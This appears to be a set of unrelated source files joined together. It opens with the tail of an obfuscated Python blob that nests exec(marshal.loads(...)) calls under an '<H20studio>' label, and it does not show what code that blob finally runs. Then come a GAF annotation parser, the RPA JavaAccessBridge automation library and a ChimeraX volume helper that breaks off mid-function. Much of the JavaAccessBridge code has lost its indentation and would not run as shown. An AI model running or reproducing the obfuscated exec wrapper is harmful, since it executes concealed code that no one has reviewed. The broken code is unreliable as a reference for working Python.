dio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x0
0\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x0
4exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r
\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xfa\x0b<H20studio>\xda\x08<module>\x05\x00\x00\x00s\x02\x00\x00\x00\x08\x01')) |
#!/usr/bin/python3
import sys
'''
gaf_to_attr -- convert a tab-delimited GAF file to an attribute dictionary
'''
def gaf_to_attr(input_file):
    """Parse a GAF (GO Annotation File) into a feature -> GO-terms mapping.

    Each tab-separated line is expected to carry the feature (gene product)
    identifier in column 2 (index 1) and the GO term in column 5 (index 4),
    matching the standard GAF column layout. Header/comment lines starting
    with ``!`` and blank lines are skipped.

    Parameters
    ----------
    input_file : str
        Path to the tab-delimited GAF file.

    Returns
    -------
    dict
        Maps each feature name to the list of its GO terms, in file order.
    """
    feature_dict = {}
    # Read-only mode: the original 'r+' needlessly required write permission.
    with open(input_file, 'r') as fh:
        for line in fh:
            line = line.strip('\n')
            # Skip blank lines and '!'-prefixed GAF comment/header lines,
            # which would otherwise raise IndexError on the column access.
            if not line or line.startswith('!'):
                continue
            m = line.split('\t')
            feature_name = m[1]
            go = m[4]
            # setdefault replaces the manual "if key in dict" branching.
            feature_dict.setdefault(feature_name, []).append(go)
    return feature_dict
#if __name__ == '__main__':
# tab_to_attr('zd1')
|
import atexit
import logging
import os
import platform
import queue
import threading
import time
from typing import Union
import warnings
from robot.api.deco import library, keyword
from robot.libraries.BuiltIn import BuiltIn
from RPA.Desktop import Desktop
if platform.system() == "Windows":
import ctypes
from ctypes import wintypes, byref
# Configure comtypes to not generate DLL bindings into
# current environment, instead keeping them in memory.
# Slower, but prevents dirtying environments.
import comtypes.client
from JABWrapper.context_tree import ContextTree, ContextNode, SearchElement
from JABWrapper.jab_wrapper import JavaAccessBridgeWrapper
comtypes.client.gen_dir = None
# Ignore warning about threading mode,
# which comtypes initializes to STA instead of MTA on import.
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=UserWarning)
import win32con
import win32gui
PeekMessage = ctypes.windll.user32.PeekMessageW
GetMessage = ctypes.windll.user32.GetMessageW
TranslateMessage = ctypes.windll.user32.TranslateMessage
DispatchMessage = ctypes.windll.user32.DispatchMessageW
ScalingFactor = ctypes.windll.shcore.GetScaleFactorForDevice(0) / 100
LocatorType = Union[ContextNode, str]
else:
ScalingFactor = 1.0
LocatorType = str
ContextNode = object
class ElementNotFound(ValueError):
    """Raised when a locator search yields no matching elements."""
@library(scope="GLOBAL", doc_format="REST", auto_keywords=False)
class JavaAccessBridge:
# pylint: disable=W1401
"""Java application UI automation library using `Java Access Bridge technology`_.
Library is at the beta level at the moment so feedback is highly appreciated.
The library utilizes `java-access-bridge-wrapper`_ package to interact with
Java UI. Currently only the 64-bit Windows OS is supported.
**Steps to enable**
1. Enable the Java Access Bridge in Windows
2. Set environment variable `RC_JAVA_ACCESS_BRIDGE_DLL` as an absolute path to `WindowsAccessBridge-64.dll`
.. code-block:: console
C:\\path\\to\\java\\bin\\jabswitch -enable
set RC_JAVA_ACCESS_BRIDGE_DLL=C:\\Program Files\\Java\\jre1.8.0_261\\bin\WindowsAccessBridge-64.dll
.. _Java Access Bridge technology: https://www.oracle.com/java/technologies/javase/javase-tech-access-bridge.html
.. _java-access-bridge-wrapper: https://github.com/robocorp/java-access-bridge-wrapper
**Locating elements**
To automate actions on the Java application, the robot needs locations to various elements
using a feature called `locators`. Locator describes properties of an element.
At the moment library contains basic level support for locators.
The common locator types are `name` and `role`.
To identify element with more than one property `and` can be used, for example:
.. code-block:: console
role:push button and name:Clear
To address element within parent element `>` can be used, for example:
.. code-block:: console
name:Find Purchase Orders > name:NumberField
    Some keywords accept an element as a parameter in place of a locator.
**Interacting with elements**
By default application elements are interacted with Actions supported by the element.
Most common example is `click` action supported by an button element.
But because application and technology support for the actions might be limited, it is also
possible to opt for interaction elements by their coordinates by giving keyword parameter
``action=False`` if parameter is available.
**Inspecting elements**
Inspecting Java application elements depends on what kind of Java UI framework the application
has been built with.
The `Accessibility Insights for Windows`_ can show element properties if application framework
supports Windows UI Automation (UIA), see more at `using Accessibility Insights`_.
The Google's `Access Bridge Explorer`_ can also be used for inspecting Java application elements.
.. _Accessibility Insights for Windows: https://accessibilityinsights.io/en/downloads/
.. _Access Bridge Explorer: https://github.com/google/access-bridge-explorer
.. _using Accessibility Insights: https://accessibilityinsights.io/docs/en/windows/reference/faq/#can-i-use-accessibility-insights-for-windows-on-a-windows-app-written-with-java
**Examples**
*robotframework*
.. code:: robotframework
*** Settings ***
Library RPA.JavaAccessBridge
Library Process
*** Tasks ***
Write text into Swing application
Start Process java -jar BasicSwing.jar
... shell=${TRUE}
... cwd=${CURDIR}
Select Window Chat Frame
Type Text role:text
... text for the textarea
Type Text role:text
... text for the input field
... index=1
... clear=${TRUE}
Click Element role:push button and name:Send
*Python*
.. code:: python
from RPA.JavaAccessBridge import JavaAccessBridge
import subprocess
jab = JavaAccessBridge()
subprocess.Popen(
["java", "-jar", "BasicSwing.jar"],
shell=True,
cwd=".",
close_fds=True
)
jab.select_window("Chat Frame")
jab.type_text(
"role:text",
"text for the textarea",
enter=True
)
jab.type_text(
"role:text",
"text for the input field",
index=1,
clear=True
)
jab.click_element("role:push button and name:Send")
""" # noqa: E501, W605
# TODO: add keyword for taking screenshots of elements and window
# TODO. implement proper XPath syntax support
    def __init__(self):
        """Initialize the library: check platform prerequisites and reset state.

        No connection to Java Access Bridge is made yet; the wrapper is
        created lazily by ``_initialize`` on the first ``Select Window``.
        """
        self.logger = logging.getLogger(__name__)
        if platform.system() != "Windows":
            self.logger.warning(
                "JavaAccessBridge library requires Windows dependencies to work"
            )
        if "RC_JAVA_ACCESS_BRIDGE_DLL" not in os.environ.keys():
            self.logger.warning(
                "Environment variable `RC_JAVA_ACCESS_BRIDGE_DLL` needs to be set to "
                "absolute path of `WindowsAccessBridge-64.dll`"
            )
        # Lazily populated state -- see _initialize() / select_window().
        self.version_printed = False  # JAB version info is logged only once
        self.jab_wrapper = None  # JavaAccessBridgeWrapper, set by _initialize()
        self.context_info_tree = None  # ContextTree of the selected window
        self.pumper_thread = None  # daemon thread pumping Windows messages
        self.refresh_counter = 1
        self.display_scale_factor = ScalingFactor  # display DPI scaling factor
    def _initialize(self):
        """Start the background message pump and obtain the JAB wrapper.

        A daemon thread runs the Windows message loop; the constructed
        ``JavaAccessBridgeWrapper`` (or ``None`` on failure) is handed back
        through a queue.

        :raises Exception: if the wrapper could not be created within 10s.
        """
        pipe = queue.Queue()
        self.pumper_thread = threading.Thread(
            target=self._pump_background, daemon=True, args=[pipe]
        )
        self.pumper_thread.start()
        # _pump_background puts the wrapper (or None on failure) into the queue.
        self.jab_wrapper = pipe.get(timeout=10)
        if not self.jab_wrapper:
            raise Exception("Failed to initialize Java Access Bridge Wrapper")
        # Give the message pump a moment to settle before first use.
        time.sleep(1)
        atexit.register(self._handle_shutdown)
        self.logger.info("Java Access Bridge Wrapper initialized")
def _handle_shutdown(self):
if self.jab_wrapper:
self.jab_wrapper.shutdown()
    def _pump_background(self, pipe: queue.Queue):
        """Run the Windows message loop that drives Java Access Bridge events.

        Executed in a daemon thread. The created wrapper (or ``None`` on
        failure) is reported back to the caller through *pipe*.

        :param pipe: queue used to hand the wrapper to the main thread
        """
        try:
            jab_wrapper = JavaAccessBridgeWrapper()
            pipe.put(jab_wrapper)
            message = byref(wintypes.MSG())
            # Standard Win32 message pump; GetMessage returns <= 0 on
            # WM_QUIT or error, which ends the loop.
            while GetMessage(message, 0, 0, 0) > 0:
                TranslateMessage(message)
                self.logger.debug("Dispatching msg=%s", repr(message))
                DispatchMessage(message)
        # pylint: disable=broad-except
        except Exception as err:
            self.logger.error(err)
            # Signal initialization failure to the waiting caller.
            pipe.put(None)
        finally:
            self.logger.info("Stopped processing events")
    @keyword
    def select_window(
        self, title: str, bring_foreground: bool = True, timeout: int = 30
    ):
        """Selects Java application window as target for the automation

        :param title: application window title
        :param bring_foreground: if application is brought to foreground or not
        :param timeout: selection timeout
        :raises ValueError: if no window with *title* was found within *timeout*
        """
        if self.jab_wrapper is None:
            self._initialize()
        window_found = False
        interval = float(0.5)  # minimum delay between retries, seconds
        end_time = time.time() + float(timeout)
        while time.time() <= end_time:
            start = time.time()
            try:
                self.jab_wrapper.switch_window_by_title(title)
                window_found = True
                break
            except Exception:  # pylint: disable=broad-except
                # Window not available yet -- keep retrying until timeout.
                pass
            finally:
                # Throttle retries so we poll at most every `interval` seconds.
                duration = time.time() - start
                if duration < interval:
                    time.sleep(interval - duration)
        if not window_found:
            raise ValueError("Did not find window '%s'" % title)
        if not self.version_printed:
            # Log JVM/bridge versions once per library instance.
            version_info = self.jab_wrapper.get_version_info()
            self.logger.info(
                "VMversion=%s; BridgeJavaClassVersion=%s; BridgeJavaDLLVersion=%s; BridgeWinDLLVersion=%s",  # noqa: E501
                version_info.VMversion,
                version_info.bridgeJavaClassVersion,
                version_info.bridgeJavaDLLVersion,
                version_info.bridgeWinDLLVersion,
            )
            self.version_printed = True
        if bring_foreground:
            handle = self.jab_wrapper.get_current_windows_handle()
            # pylint: disable=c-extension-no-member
            win32gui.ShowWindow(handle, win32con.SW_SHOW)
            # pylint: disable=c-extension-no-member
            win32gui.SetForegroundWindow(handle)
        # Build the element tree for the newly selected window.
        self.application_refresh()
def _parse_locator(self, locator):
levels = locator.split(">")
levels = [lvl.strip() for lvl in levels]
searches = []
for lvl in levels:
conditions = lvl.split(" and ")
lvl_search = []
for cond in conditions:
parts = cond.split(":", 1)
if len(parts) == 1:
parts = ["name", parts[0]]
lvl_search.append(parts)
searches.append(lvl_search)
return searches
def _find_elements(self, locator: str, index: int = None):
if not self.context_info_tree:
raise ValueError("ContextTree has not been initialized")
searches = self._parse_locator(locator)
self.logger.info("Searches: %s", searches)
elements = []
for lvl, search in enumerate(searches):
search_elements = []
for s in search:
search_elements.append(SearchElement(s[0], s[1]))
if lvl == 0:
elements = self.context_info_tree.get_by_attrs(search_elements)
else:
sub_matches = []
for elem in elements:
matches = elem.get_by_attrs(search_elements)
sub_matches.extend(matches)
elements = sub_matches
self.logger.info('Search "%s" returned %s element(s)', locator, len(elements))
if index and len(elements) > (index + 1):
raise AttributeError(
"Locator '%s' returned only %s elements (can't index element at %s)"
% (locator, len(elements), index)
)
return elements if index is None else [elements[index]]
@keyword
def set_mouse_position(self, element: ContextNode):
"""Set mouse position to element center
:param element: target element
"""
left, top, right, bottom = self._get_scaled_coordinates(element)
middle_x = int((left + right) / 2)
middle_y = int((top + bottom) / 2)
point = f"point:{middle_x},{middle_y}"
Desktop().move_mouse(point)
    @keyword
    def type_text(
        self,
        locator: str,
        text: str,
        index: int = 0,
        clear: bool = False,
        enter: bool = False,
    ):
        """Type text into coordinates defined by locator

        :param locator: target element
        :param text: text to write
        :param index: target element if multiple are returned
        :param clear: should element be cleared before typing
        :param enter: should enter key be pressed after typing
        :raises ValueError: if *clear* is set and the element could not be
            emptied, or if the typed text does not appear in the element
        """
        element = self._find_elements(locator, index)
        # Click first to place the caret, then request focus explicitly.
        self._click_element_middle(element[0])
        element[0].request_focus()
        if clear:
            self.wait_until_element_is_focused(element[0])
            element_cleared = False
            # Select-all + delete, retried because element text updates
            # asynchronously after key presses.
            for _ in range(10):
                Desktop().press_keys("ctrl", "a")
                Desktop().press_keys("delete")
                try:
                    self.wait_until_element_text_equals(element[0], "")
                    element_cleared = True
                except ValueError:
                    # Not empty yet -- try again.
                    pass
            if not element_cleared:
                raise ValueError(f"Element={element} not cleared")
        Desktop().type_text(text, enter=enter)
        # Verify the text actually landed in the element.
        self.wait_until_element_text_contains(element[0], text)
    @keyword
    def get_elements(self, locator: str):
        """Get matching elements

        :param locator: elements to get
        :return: list of all matching elements
        """
        return self._find_elements(locator)
    @keyword
    def wait_until_element_text_contains(
        self, locator: LocatorType, text: str, index: int = 0, timeout: float = 0.5
    ):
        """Wait until element text contains expected text

        :param locator: target element
        :param text: element text should contain this
        :param index: target element index if multiple are returned
        :param timeout: timeout in seconds to wait, default 0.5 seconds
        :raises ValueError: if *text* did not appear within *timeout*
        """
        matching = self._get_matching_element(locator, index)
        end_time = time.time() + float(timeout)
        while time.time() <= end_time:
            # Poll the accessible text; it updates asynchronously.
            # pylint: disable=protected-access
            if text in matching.text._items.sentence:
                return
            time.sleep(0.05)
        raise ValueError(f"Text={text} not found in element={matching}")
    @keyword
    def wait_until_element_text_equals(
        self, locator: LocatorType, text: str, index: int = 0, timeout: float = 0.5
    ):
        """Wait until element text equals expected text

        :param locator: target element
        :param text: element text should match this
        :param index: target element index if multiple are returned
        :param timeout: timeout in seconds to wait, default 0.5 seconds
        :raises ValueError: if the text did not match within *timeout*
        """
        matching = self._get_matching_element(locator, index)
        end_time = time.time() + float(timeout)
        while time.time() <= end_time:
            # Poll the accessible text; it updates asynchronously.
            # pylint: disable=protected-access
            if text == matching.text._items.sentence:
                return
            time.sleep(0.05)
        raise ValueError(f"Text={text} not found in element={matching}")
    @keyword
    def wait_until_element_is_focused(
        self, locator: LocatorType, index: int = 0, timeout: float = 0.5
    ):
        """Wait until element is focused

        :param locator: target element
        :param index: target element index if multiple are returned
        :param timeout: timeout in seconds to wait, default 0.5 seconds
        :raises ValueError: if the element did not gain focus within *timeout*
        """
        matching = self._get_matching_element(locator, index)
        end_time = time.time() + float(timeout)
        while time.time() <= end_time:
            # NOTE(review): compares the state string for equality -- assumes
            # the element reports exactly "focused"; confirm behavior for
            # elements carrying multiple state flags.
            if matching.state == "focused":
                return
            time.sleep(0.05)
        raise ValueError(f"Element={matching} not focused")
    @keyword
    def get_element_text(self, locator: LocatorType, index: int = 0):
        """Get element text

        :param locator: target element
        :param index: target element index if multiple are returned
        :return: the element's accessible text content
        """
        matching = self._get_matching_element(locator, index)
        # pylint: disable=protected-access
        return matching.text._items.sentence
def _get_matching_element(self, locator: LocatorType, index: int = 0):
matching = None
if isinstance(locator, str):
elements = self._find_elements(locator)
if len(elements) < (index + 1):
raise ElementNotFound(
"Locator '%s' matched only %s elements" % (locator, len(elements))
)
matching = elements[index]
else:
matching = locator
return matching
    @keyword
    def get_element_actions(self, locator: str):
        """Get list of possible element actions

        :param locator: target element
        :return: action names supported by the first matching element
        """
        elements = self._find_elements(locator)
        return elements[0].get_actions().keys()
def _elements_to_console(self, elements, function=""):
BuiltIn().log_to_console(f"\nElements to Console: {function}")
for elem in elements:
BuiltIn().log_to_console(str(elem).strip())
@keyword
def highlight_element(self, locator: LocatorType, index: int = 0):
"""Highlight an element
:param locator: element to highlight
:param index: target element index if multiple are returned
"""
matching = self._get_matching_element(locator, index)
self.logger.info("Highlighting element: %s", repr(matching))
region_locator = self._get_region_locator(matching)
Desktop().highlight_elements(region_locator)
def _get_scaled_coordinates(self, element):
left = int(self.display_scale_factor * (element.context_info.x))
top = int(self.display_scale_factor * (element.context_info.y))
width = int(self.display_scale_factor * (element.context_info.width))
height = int(self.display_scale_factor * (element.context_info.height))
right = left + width
bottom = top + height
return left, top, right, bottom
    def _get_region_locator(self, element):
        """Build an RPA.Desktop region locator from the element's screen box."""
        left, top, right, bottom = self._get_scaled_coordinates(element)
        return Desktop().define_region(left, top, right, bottom)
@keyword
def click_element(
self,
locator: LocatorType,
index: int = 0,
action: bool = True,
timeout: int = 10,
):
"""Click element
:param target: element to click
:param index: target element index if multiple are returned
:param action: call click action on element (default), or use coordinates
:param timeout: timeout in seconds to find element
"""
if isinstance(locator, str):
interval = float(0.2)
end_time = time.time() + float(timeout)
while time.time() <= end_time:
start = time.time()
elements = self._find_elements(locator)
if len(elements) > 0:
break
duration = time.time() - start
if duration < interval:
time.sleep(interval - duration)
if len(elements) < (index + 1):
raise ElementNotFound(
"Locator '%s' matched only %s elements" % (locator, len(elements))
)
matching = elements[index]
else:
matching = locator
try:
if action:
self.logger.info("Element click action type:%s", type(matching))
matching.do_action("click")
else:
self._click_element_middle(matching)
except NotImplementedError:
self._click_element_middle(matching)
@keyword
def call_element_action(self, locator: str, action: str):
"""Call element action
:param locator: target element
:param action: name of the element action to call
"""
elements = self._find_elements(locator)
if len(elements) != 1:
raise ElementNotFound("Locator %s did not match a unique element" % locator)
matching = elements[0]
self.logger.info("Element '%s' action", action)
matching.do_action(action)
    def _click_element_middle(self, element):
        """Click the center point of *element* using screen coordinates.

        :param element: element whose scaled bounding box is clicked
        :raises AttributeError: if the element reports -1 coordinates
            (i.e. it is not visible on screen)
        """
        # TODO. change to use RPA.core.geometry Region/Point
        # region = Region.from_size(
        #     element.left,
        #     element.top,
        #     element.width,
        #     element.height
        # )
        # region.scale(self.scale_factor)
        # Desktop().click(region.center)
        self.logger.info("Element click coordinates")
        left, top, right, bottom = self._get_scaled_coordinates(element)
        if left == -1 or top == -1:
            raise AttributeError("Can't click on negative coordinates")
        middle_x = int((left + right) / 2)
        middle_y = int((top + bottom) / 2)
        point = f"point:{middle_x},{middle_y}"
        Desktop().click(point)
    @keyword
    def toggle_drop_down(self, locator: str, index: int = 0):
        """Toggle dropdown action on element

        :param locator: element locator
        :param index: target element index if multiple are returned
        """
        elements = self._find_elements(locator)
        matching = elements[index]
        matching.toggle_drop_down()
    @keyword
    def application_refresh(self):
        """Refresh application element tree

        Might be required action after application element
        structure changes after window refresh.
        """
        # Rebuild the cached element tree from the current window state.
        self.context_info_tree = ContextTree(self.jab_wrapper)
    @keyword
    def press_keys(self, *keys):
        """Press multiple keys down simultaneously

        See `Desktop`_ library documentation for supported keys

        .. _Desktop: https://rpaframework.org/libraries/desktop/index.html

        :param keys: keys to press
        """
        # Delegates directly to RPA.Desktop's key pressing.
        Desktop().press_keys(*keys)
    @keyword
    def print_element_tree(self, filename: str = None):
        """Print current element into log and possibly into a file

        :param filename: filepath to save element tree
        :return: the element tree as a string
        """
        tree = repr(self.context_info_tree)
        self.logger.info(tree)
        if filename:
            with open(filename, "w") as f:
                f.write(tree)
            self.logger.info("Context tree written to file '%s'", filename)
        return tree
@keyword
def select_menu(self, menu: str, menuitem: str):
"""Select menu by clicking menu elements
:param menu: name of the menu
:param menuitem: name of the menu item
"""
self.click_element(f"role:menu and name:{menu}")
self.click_element(f"role:menu item and name:{menuitem}")
@keyword
def click_push_button(self, button_name: str):
"""Click element of role `push button`
:param button_name: name of the button to click
"""
locator = f"role:push button and name:{button_name}"
self.click_element(locator)
    @keyword
    def shutdown_jab(self):
        """Call Java Access Bridge process shutdown"""
        # NOTE(review): assumes Select Window has initialized the wrapper;
        # calling this first would fail on a None wrapper.
        self.jab_wrapper.shutdown()
|
import os
import shutil
from general_utils.string_utils import get_float_between_ss, get_float_value
from general_utils.temp_utils import gen_dir, free_dir
from general_utils.terminal_utils import get_out
def get_mass_angstrom(map_path):
    """Compute the enclosed volume ("mass") of a density map via ChimeraX.

    Writes a small ChimeraX command script into a scratch directory, runs
    ``chimerax --nogui`` on the map, and parses the reported enclosed
    volume from the output.

    :param map_path: path to the density map file
    :return: enclosed volume for surface #1.1, parsed from ChimeraX output
    :raises Exception: if the ChimeraX subprocess exits with an error
    """
    map_real_path = os.path.abspath(map_path)
    path = gen_dir()
    # Start from a clean scratch directory.
    if os.path.exists(path):
        shutil.rmtree(path)
    os.mkdir(path)
    # Context manager guarantees the script file is closed even on error
    # (the original leaked the handle on exceptions).
    with open(path + "/fit.cxc", "w+") as f:
        f.write("volume #1 origin 0,0,0 \r\n")
        f.write("measure volume #1\r\n")
        f.write("exit")
    commands_real_path = os.path.abspath(path + "/fit.cxc")
    error, exit_binary_text = get_out("chimerax", "--nogui", map_real_path, commands_real_path)
